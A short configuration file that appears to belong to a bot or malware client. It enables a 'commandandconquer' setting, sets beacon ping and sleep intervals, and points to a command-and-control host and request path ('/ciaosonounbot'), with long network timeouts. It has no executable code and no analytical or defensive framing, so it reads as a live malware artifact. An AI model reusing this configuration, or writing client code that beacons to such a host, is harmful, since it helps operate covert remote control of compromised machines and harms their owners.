config.commandandconquerStatus=true
config.pingdelay = 2000
config.sleeptime = 20000

config.dnsurl=005myvt.nwsvr1.com
config.urirequest=/ciaosonounbot

config.requestTimeout=600000
config.connectTimeout=600000
config.readTimeout=600000

